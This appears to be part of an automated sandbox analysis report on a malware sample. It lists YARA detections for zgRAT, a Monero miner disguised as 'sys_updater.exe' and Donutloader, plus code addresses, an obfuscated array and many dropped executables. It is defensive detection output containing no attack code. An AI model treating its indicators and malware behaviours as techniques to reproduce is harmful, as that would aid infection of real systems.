                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 24.3.sys_updater.exe.21e0345551d.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 24.3.sys_updater.exe.21e034544fd.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad04cd.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 24.3.sys_updater.exe.21e034544fd.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad10e5.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 31.3.sys_updater.exe.20e49503455.3.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 27.3.sys_updater.exe.159f35a4885.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 31.3.sys_updater.exe.20e4950304d.2.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 31.3.sys_updater.exe.20e494ac50d.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 31.3.sys_updater.exe.20e494ac915.1.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                            Source: 0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 00000009.00000003.2181775167.00000234D5AAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 00000018.00000003.2693194416.0000021E0319A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 00000018.00000003.2692757034.0000021E034D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            Source: 0000000A.00000002.1823708292.000000006C79B000.00000004.00000001.01000000.0000000D.sdmp, type: MEMORYMatched rule: Detects zgRAT Author: ditekSHen
                            Source: 00000018.00000003.2692958541.0000021E0318C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
                            .NET source code contains very large array initializations
                            Source: HM3SOlbpH71yEXUIEAOeIiGX.exe.4.dr, -Module-.csLarge array initialization: _202D_200B_200C_200E_206C_206A_206C_206A_206C_202B_202B_202D_202E_206B_206A_206C_200E_202B_206C_206B_206A_206B_206A_200E_202C_200F_200E_206B_206E_206B_200E_206F_200E_206E_206C_200B_200E_202B_202D_200D_202E: array initializer size 70240
                            Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exeProcess Stats: CPU usage > 49%
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C7787A0 GetModuleHandleW,GetProcAddress,NtQueryInformationProcess,GetModuleHandleW,GetProcAddress,10_2_6C7787A0
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005E98AE0_2_005E98AE
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005D65F00_2_005D65F0
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005D58800_2_005D5880
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F19A00_2_005F19A0
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_006002CE0_2_006002CE
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F72BB0_2_005F72BB
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005F8B600_2_005F8B60
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005DA3300_2_005DA330
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_0060B4B10_2_0060B4B1
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005DD5500_2_005DD550
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_00602D190_2_00602D19
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_0060B5D10_2_0060B5D1
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005D47800_2_005D4780
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: 0_2_005E57800_2_005E5780
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005498AE3_2_005498AE
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005365F03_2_005365F0
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005358803_2_00535880
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005519A03_2_005519A0
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005602CE3_2_005602CE
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005572BB3_2_005572BB
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00558B603_2_00558B60
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_0053A3303_2_0053A330
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_0056B4B13_2_0056B4B1
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_0053D5503_2_0053D550
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_00562D193_2_00562D19
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_0056B5D13_2_0056B5D1
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005347803_2_00534780
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: 3_2_005457803_2_00545780
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C77914010_2_6C779140
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C77134010_2_6C771340
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C7787A010_2_6C7787A0
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C77103010_2_6C771030
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C7930D510_2_6C7930D5
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C778E1010_2_6C778E10
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_6C78738010_2_6C787380
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B0F9810_2_017B0F98
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B2CE010_2_017B2CE0
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B2CD110_2_017B2CD1
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B37D010_2_017B37D0
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B37C110_2_017B37C1
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: 10_2_017B0EF810_2_017B0EF8
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_014C772012_2_014C7720
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_014C746812_2_014C7468
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_014C771312_2_014C7713
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_06F5057812_2_06F50578
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_06F5F45812_2_06F5F458
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_06F5056812_2_06F50568
                            Source: C:\Users\user\AppData\Local\Temp\23495762359867\explert.exeCode function: String function: 00551660 appears 54 times
                            Source: C:\Users\user\Desktop\RPHbzz3JqY.exeCode function: String function: 005F1660 appears 54 times
                            Source: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exeCode function: String function: 6C788630 appears 33 times
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yt3cew8k69RKLpgTFur2iz2M.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: b1s7nlT2NqFJ3sl3xbYiMCIq.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ix4A2DreBBsQwY6YHkidcDjo.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: YAPNXRPmcarcR4ZDgC81Tbdk.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: SmLAztxc1o8yfogkJXrRjbDt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: FRaqbC8wSA1XvpFVjCRGryWt.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 3HvoFOAmEaJswFCHOzyfyz5b.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6KZmcK8r6beUzmRf6Ci6nx8d.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: yDd3OJXsNQptgFrYILoygXLs.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: xpTljBOh8s4KWiGtXsL1c00g.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: oZolmRBaYFkuutSgcOrBLSAQ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: V6uPDVniSnRMWuLn5U9T3TGJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 2TUSzbAUfKRfcjcMzfoV1qdi.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: ixjnzi95HfqR77bieLYCT4aJ.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: 6pkNzPZrIkyPzGNsokLQ8aZR.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: hQdOgl4rhYQYx3G5aYY61LEd.exe.4.drStatic PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                            Source: RPHbzz3JqY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c770000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 10.2.HM3SOlbpH71yEXUIEAOeIiGX.exe.6c79b000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                            Source: 24.3.sys_updater.exe.21e0345551d.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 24.3.sys_updater.exe.21e034544fd.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad04cd.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 24.3.sys_updater.exe.21e034544fd.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 9.3.IIZS2TRqf69aZbLAX3cf3edn.exe.234d5ad10e5.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 31.3.sys_updater.exe.20e49503455.3.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 27.3.sys_updater.exe.159f35a4885.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
                            Source: 31.3.sys_updater.exe.20e4950304d.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 31.3.sys_updater.exe.20e494ac50d.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 31.3.sys_updater.exe.20e494ac915.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                            Source: 0000001B.00000003.2794263235.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
